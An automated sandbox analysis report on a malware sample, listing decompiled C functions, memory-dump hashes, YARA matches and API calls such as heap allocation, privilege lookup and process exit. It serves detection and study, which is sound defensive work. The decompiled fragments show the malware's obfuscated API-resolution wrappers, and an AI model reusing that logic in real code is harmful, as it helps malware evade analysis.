                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                                                                            • Instruction ID: 6fdc963d377834b0a064d8214de8bbad113d7f58b15d2d6f1667bfcf27c78586
                                                                            • Opcode Fuzzy Hash: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                                                                            • Instruction Fuzzy Hash: 5C900265211000030245A5690704547044AD7D6391751C031F1005550DE6619861A161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                                                                            • Instruction ID: b62f8a6b413fb2177cdc4edd5fefbc2f2935ab137269409b8ec9dd0c6d14d3a7
                                                                            • Opcode Fuzzy Hash: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                                                                            • Instruction Fuzzy Hash: 0D90027120108803D2506169840478A0409D7D1341F55C431A4414658ED6D59891B161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                                                                            • Instruction ID: 4ec6d0ab08d1ee59a6b4864bcf481c1903aaa66e194012fb41418201fa245892
                                                                            • Opcode Fuzzy Hash: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                                                                            • Instruction Fuzzy Hash: F590027120100803D2C07169440468A0409D7D2341F91C035A0015654EDA559A59B7E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                                                                            • Instruction ID: ceb4d3130027b1f5628589beb108d1fdc226f9c86e3ca676adc37d3f1e3a5871
                                                                            • Opcode Fuzzy Hash: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                                                                            • Instruction Fuzzy Hash: 3F90026130100003D280716954186464409E7E2341F51D031E0404554DE9559856A262
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                                                                            • Instruction ID: c26b373f7e9dcfbc1e949bd09492a6bf0a8ebf2337154de2992019c4d7549f9e
                                                                            • Opcode Fuzzy Hash: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                                                                            • Instruction Fuzzy Hash: 3290026921300003D2C07169540864A0409D7D2342F91D435A0005558DD9559869A361
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
                                                                            • Instruction ID: c3b827b3f31b74d0e0caca9a2511dcdda4f382e711fed3e9a857d7da4aa8c421
                                                                            • Opcode Fuzzy Hash: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
                                                                            • Instruction Fuzzy Hash: 1290027131114403D250616984047460409D7D2341F51C431A0814558ED6D59891B162
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                                                                            • Instruction ID: 2b057bafcf461e0b902f9482d1ee2a5fe4d3375714656251b7a950b0c951bc90
                                                                            • Opcode Fuzzy Hash: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                                                                            • Instruction Fuzzy Hash: CC90027120100403D24065A954086860409D7E1341F51D031A5014555FD6A59891B171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                            • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                            • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                            • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418446, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 58%
                                                                            			E00418446(intOrPtr __eax, void* __edi, void* _a4, void* _a8, void* _a12) {

				asm("xlatb");
				 *0x642c23b1 = __eax;
				if (__edi - 0x31 > 0) goto L3;
			}



                                                                            0x00418449
                                                                            0x0041844a
                                                                            0x0041844f

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: hA
                                                                            • API String ID: 1279760036-1221461045
                                                                            • Opcode ID: ef07a568ac8bbcf0d3657dfe2f105c3164f74fbf392ed9d8499c06b2ed10b1e3
                                                                            • Instruction ID: dc5cfa27bc92d6c3bb25a621edd63e2758f1237e4b5122244fd45afae69b1cd4
                                                                            • Opcode Fuzzy Hash: ef07a568ac8bbcf0d3657dfe2f105c3164f74fbf392ed9d8499c06b2ed10b1e3
                                                                            • Instruction Fuzzy Hash: 3BF08CB26043106BDB24EF98DC84EEB736DEF84390F10445AFA485B241D931E904C7E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004184B2, Relevance: 1.6, APIs: 1, Instructions: 70memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 37%
                                                                            			E004184B2(void* __ebx, void* __esi, void* __eflags, void* _a4, long _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				intOrPtr _v0;
				char _v3;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t33;
				intOrPtr _t44;
				void* _t49;
				intOrPtr* _t52;
				void* _t56;

				asm("cli");
				if(__eflags >= 0) {
					_t23 = _a4;
					_t10 = _t23 + 0xc80; // 0x8bec97d5
					_t52 = _t10;
					E00418DB0(_t49, _a4, _t52,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x37);
					_t26 = _a36;
					_t44 = _a28;
					_t27 = _a24;
					__eflags =  &_v3;
					asm("sbb al, 0x51");
					return  *((intOrPtr*)( *_t52))(_a8, _a12, _a16, _a20, _t27, _t44, _t26, _a40, _a44, _a48, _a52, __esi, _t56);
				} else {
					_push(0x8b558182);
					_push(_t56);
					_t30 = _v0;
					_push(__esi);
					_t4 = _t30 + 0xc74; // 0xc74
					E00418DB0(0xb3b5a8b9, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
					_t33 = RtlFreeHeap(_a4, _a8, _a12); // executed
					return _t33;
				}
			}












                                                                            0x004184b2
                                                                            0x004184b3
                                                                            0x00418533
                                                                            0x00418542
                                                                            0x00418542
                                                                            0x0041854a
                                                                            0x00418560
                                                                            0x00418568
                                                                            0x0041856c
                                                                            0x0041856d
                                                                            0x0041856e
                                                                            0x00418588
                                                                            0x004184b5
                                                                            0x004184bd
                                                                            0x004184c0
                                                                            0x004184c3
                                                                            0x004184c9
                                                                            0x004184cf
                                                                            0x004184d7
                                                                            0x004184ed
                                                                            0x004184f1
                                                                            0x004184f1

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 4d703ab658ba21b1064eba8c8032abbb217280a2b8c5da063c7b2e11d205b546
                                                                            • Instruction ID: 4c26110982e54e33908c75919cddff1711db29b15eae7b1de9a814863582b7ef
                                                                            • Opcode Fuzzy Hash: 4d703ab658ba21b1064eba8c8032abbb217280a2b8c5da063c7b2e11d205b546
                                                                            • Instruction Fuzzy Hash: 0911F9B2210208BFDB14DF99DC85EEB77ADAF8C354F158259FA0D97241C630E951CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 63%
                                                                            			E00407260(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4, long _a8, intOrPtr _a57327689) {
				char _v67;
				char _v68;
				void* _t14;
				intOrPtr* _t15;
				int _t16;
				void* _t20;
				long _t24;
				intOrPtr* _t28;
				void* _t29;
				void* _t33;

				_t33 = __eflags;
				_t20 = __ecx;
				_v68 = 0;
				L00419D10( &_v67, 0, 0x3f);
				_a57327689 = _a57327689 + _t20;
				_push(_t20);
				E0041A8F0();
				_t14 = E00409B10(__ebx, _t33, _a4 + 0x1c,  &_v68); // executed
				_t15 = L00413E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t28 = _t15;
				if(_t28 != 0) {
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t35 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t28(_t24, 0x8003, _t29 + (E00409270(_t35, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
					return _t16;
				}
				return _t15;
			}













                                                                            0x00407260
                                                                            0x00407260
                                                                            0x0040726f
                                                                            0x00407273
                                                                            0x00407277
                                                                            0x0040727d
                                                                            0x0040727e
                                                                            0x0040728e
                                                                            0x0040729e
                                                                            0x004072a3
                                                                            0x004072aa
                                                                            0x004072ad
                                                                            0x004072ba
                                                                            0x004072bc
                                                                            0x004072be
                                                                            0x004072db
                                                                            0x004072db
                                                                            0x00000000
                                                                            0x004072dd
                                                                            0x004072e2

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                            • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                            • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                            • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407206, Relevance: 1.5, APIs: 1, Instructions: 48threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 51%
                                                                            			E00407206(void* __ebx, void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, long _a12, intOrPtr _a57327693) {
				char _v64;
				void* _t12;
				int _t13;
				void* _t24;
				long _t28;
				int _t32;
				void* _t34;

				asm("adc al, 0x77");
				if(__eflags > 0) {
					_a57327693 = _a57327693 + __ecx;
					_push(__ecx);
					E0041A8F0();
					_t12 = E00409B10(__ebx, __eflags, _a8 + 0x1c,  &_v64); // executed
					_t13 = L00413E20(_a8 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
					_t32 = _t13;
					__eflags = _t32;
					if(_t32 != 0) {
						_t28 = _a12;
						_t13 = PostThreadMessageW(_t28, 0x111, 0, 0); // executed
						__eflags = _t13;
						if(__eflags == 0) {
							_t13 =  *_t32(_t28, 0x8003, _t34 + (E00409270(__eflags, 1, 8) & 0x000000ff) - 0x40, _t13);
						}
					}
					return _t13;
				} else {
					_push(_t34);
					_t24 = L004195C0(__ecx);
					if(_t24 == 0 || _t24 == 0x33333333) {
						__eflags = 0;
						return 0;
					} else {
						return  *_a4 + _t24;
					}
				}
			}










                                                                            0x00407206
                                                                            0x00407208
                                                                            0x00407277
                                                                            0x0040727d
                                                                            0x0040727e
                                                                            0x0040728e
                                                                            0x0040729e
                                                                            0x004072a3
                                                                            0x004072a8
                                                                            0x004072aa
                                                                            0x004072ad
                                                                            0x004072ba
                                                                            0x004072bc
                                                                            0x004072be
                                                                            0x004072db
                                                                            0x004072db
                                                                            0x004072dd
                                                                            0x004072e2
                                                                            0x0040720a
                                                                            0x00407210
                                                                            0x00407218
                                                                            0x0040721c
                                                                            0x0040722f
                                                                            0x00407232
                                                                            0x00407226
                                                                            0x0040722e
                                                                            0x0040722e
                                                                            0x0040721c

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 7461327ca472f73772ee0c7d2f6fe208f2fb5bb45eb805c6cdd30b4da6b54e1d
                                                                            • Instruction ID: 0759a2ec85ded8d69395a1c64b6a36d62cddc8d75783b6b2566bfd242a08df81
                                                                            • Opcode Fuzzy Hash: 7461327ca472f73772ee0c7d2f6fe208f2fb5bb45eb805c6cdd30b4da6b54e1d
                                                                            • Instruction Fuzzy Hash: 29F0F931E802143ADB206A655C02FFF77185B41B14F15445EFE04BE1C2D5AD7D1646EA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 33%
                                                                            			E004184F2(void* __eax, void* __ecx, void* __eflags) {
				intOrPtr _t10;
				intOrPtr _t17;
				void* _t21;
				void* _t24;
				void* _t25;

				asm("adc al, 0x59");
				if(__eflags == 0) {
					_t22 = __eax + 0xc7c;
					E00418DB0(_t21, __eax, __eax + 0xc7c, __ecx, 0, 0x36);
					ExitProcess( *(_t24 + 0xc));
				}
				_t17 =  *((intOrPtr*)(_t24 + 0x20));
				_t10 =  *((intOrPtr*)(_t24 + 0x1c));
				_t25 = _t24 + 1;
				asm("sbb al, 0x51");
				return  *((intOrPtr*)( *_t22))( *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)),  *((intOrPtr*)(_t25 + 0x14)),  *((intOrPtr*)(_t25 + 0x18)), _t10, _t17, __eax);
			}








                                                                            0x004184f2
                                                                            0x004184f4
                                                                            0x00418512
                                                                            0x0041851a
                                                                            0x00418528
                                                                            0x00418528
                                                                            0x00418568
                                                                            0x0041856c
                                                                            0x0041856d
                                                                            0x0041856e
                                                                            0x00418588

                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: 868c5dcbd07d2c4d49c012475ad494f2cd898b0f99345c713dcf96ab50a3015d
                                                                            • Instruction ID: 462253f85ee59e02bb8fcadd2d2326705f9368a32f61f26b283835965c256d33
                                                                            • Opcode Fuzzy Hash: 868c5dcbd07d2c4d49c012475ad494f2cd898b0f99345c713dcf96ab50a3015d
                                                                            • Instruction Fuzzy Hash: 89F0F8B2200104BFDB14DF98DC80EEB73ADEF8C750F21860DBA1C97240CA34E9528BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                            0x004184cf
                                                                            0x004184d7
                                                                            0x004184ed
                                                                            0x004184f1

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                            0x00418497
                                                                            0x004184ad
                                                                            0x004184b1

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                            0x0041863a
                                                                            0x00418650
                                                                            0x00418654

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                            0x00418503
                                                                            0x0041851a
                                                                            0x00418528

                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004184F9, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 75%
                                                                            			E004184F9(int _a8) {
				intOrPtr _t9;
				void* _t11;

				asm("adc esi, [0x558fc8c3]");
				_t5 = _a8;
				_t9 =  *((intOrPtr*)(_a8 + 0xa14));
				E00418DB0(_t11, _t5, _t5 + 0xc7c, _t9, 0, 0x36);
				ExitProcess(_a8);
			}





                                                                            0x004184fa
                                                                            0x00418503
                                                                            0x00418506
                                                                            0x0041851a
                                                                            0x00418528

                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: 4433c58c9ad5b3ddc074846c3122e260f22d08ae378467dda185a9eb3183c5b1
                                                                            • Instruction ID: 7e3685289a6ae6d128e77e16f9486eb72cb277db1207faf211c42ad0191ee468
                                                                            • Opcode Fuzzy Hash: 4433c58c9ad5b3ddc074846c3122e260f22d08ae378467dda185a9eb3183c5b1
                                                                            • Instruction Fuzzy Hash: 4AE012756103147BD620DF54CC85FD737A8DF49750F158059BE586B381C935BA05CAE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                                                                            • Instruction ID: b5498e74984cec40a2c6a38f7ece94c688bc02762c3818d5905e012efedaac04
                                                                            • Opcode Fuzzy Hash: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                                                                            • Instruction Fuzzy Hash: AFB092B29024D5CAEB51E7B04A08B2B7E04BBE6741F26C072E2020785B8778D491F6B6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00AA98A0, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
                                                                            • Instruction ID: 80e7c74b88f51f5b80398f446ee9277c9114b3a0ad81874ba7596e57ede1daa3
                                                                            • Opcode Fuzzy Hash: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
                                                                            • Instruction Fuzzy Hash: 3690026130100403D24261694414646040DD7D2385F91C032E1414555ED6659953F172
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9820, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
                                                                            • Instruction ID: f719995656ee623fe352466aea71d6d429b4a295b24b0a4bbf22f93bc17f59a5
                                                                            • Opcode Fuzzy Hash: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
                                                                            • Instruction Fuzzy Hash: B690027124100403D28171694404646040DE7D1381F91C032A0414554FD6959A56FAA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AAB040, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
